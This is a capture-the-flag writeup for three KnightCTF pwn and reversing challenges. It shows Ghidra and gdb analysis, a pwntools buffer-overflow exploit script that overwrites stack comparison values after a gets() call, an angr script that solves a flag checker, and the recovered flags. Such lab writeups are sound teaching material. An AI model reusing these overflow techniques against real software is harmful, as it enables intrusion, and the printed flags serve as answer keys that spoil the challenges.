PWN, REV

KnightCTF pwn challenges writeup

What’s your name [50 points]

  • They gave us a zip file to download, so lets unzip it and add the binary file to GHIDRA

Main function

disas-main

  • gets() is vulnerable to buffer overflow
  • in line 14 they’re checking the value 100 is still in that variable or not
  • If we overwrite that variable then the if condition will be statisfied means the value 100 will be overwritten
  • So we can get the flag
  • Ok how we can do that?
    • char user_input array can store upto 60 bytes
    • in memory after the user_input there will be the value of the integer (100)
    • so if we give more than 60 bytes it’ll overwrite that integer
    • let’s try that

  • Now let’s try this at remote server

  • Nice we got our flag KCTF{bAbY_bUfF3r_0v3Rf1Ow}

What’s your name 2 [100 points]

  • They gave us a zip file to download, so lets unzip it and add the binary file to GHIDRA

Main function

  • In ghidra we can reaname a variable by pressing L or right click it and do rename variable
  • And we can add comments too (by pressing ; semicolon in that particular line)
  • That’s what I did here, so don’t confuse coz it’s different.. It’s fully for your understanding purpose

  • I think I explained in the picture so it’s enough to understand the vulnerablity , lets skip to the exploitation part
  • In line 22 there are two condition checks
  • One with 0x5445454c , anther one with 0x534b544e
  • So we need to overwrite those values
  • First let’s find in which offset they are located
  • Let’s open it with gdb and disassemble the main function

  • Let’s set breakpoints in both compare instructions

  • run it. I’m giving a pattern here as input

  • We hit our first break point, let see what’s in eax register

  • So we need to place 0x5445454c at 76th position
  • Before going to next breakpoint we need to set this register value as 0x5445454c
  • set $eax=0x5445454c and continue
  • Then only it jumps to next comparison, otherwise it directly exits
  • Now we hit our 2nd breakpoint, let’s see what’s in eax register

  • So we need to place 0x534b544e at 72nd position
  • Fine now let’s write our exploit
  • Don’t forget we need to convert these values into little endian format

Exploit script

#!/usr/bin/python3
from pwn import *
p = process('whats_your_name_two')

payload = b'A'*72 # fill 72 bytes with junk

''' 
>>> from pwn import *
>>> p64(0x534b544e)
b'NTKS\x00\x00\x00\x00'
our second argument starting at 76th position, 
so let's leave the nullbytes and take only "NTKS"
'''
payload += b'NTKS'
payload += p64(0x5445454c) # here we can send with null bytes, no problems

p.sendline(payload)
p.interactive()
  • Nice it works, let’s send this in remote server

  • Cool we got our flag KCTF{bUfF3r_0v3Rf1Ow_i5_fUn_r1Gh7}

Hackers Vault [100 points]

  • They gave us a zip file to download, so lets unzip it and add the binary file to GHIDRA
  • I was concentrating on other challenge so I automated this challenge with angr

angr script

#!/usr/bin/python3
import angr
import claripy
import sys

good_address = 0x0040124a
bad_address = 0x00401288
base_addr = 0x00400000
flag_length = 6
binary = './hackers_vault'

proj=angr.Project(binary,load_options={'auto_load_libs':False},main_opts={'base_addr':base_addr})
flag=[claripy.BVS('flag%i'%i,8) for i in range(flag_length)]

flag_concat=claripy.Concat(*flag + [claripy.BVV("\n")])
state=proj.factory.entry_state(stdin=flag_concat) 
for i in flag: 
    state.solver.add(i>=32)
    state.solver.add(i<=127)
simgr=proj.factory.simgr(state)
simgr.explore(find=good_address,avoid=bad_address)
if simgr.found:
    simulation=simgr.found[0]
    print(simulation.posix.dumps(sys.stdin.fileno()))
else:
    print("FAILURE")
  • I know it’s too much for this
  • But it works, that’s what we need

  • IN REMOTE

  • flag KCTF{b1NaRy_3xOpL0iTaT1On_r0cK5}
  • That’s all for this category, easy pwns 😛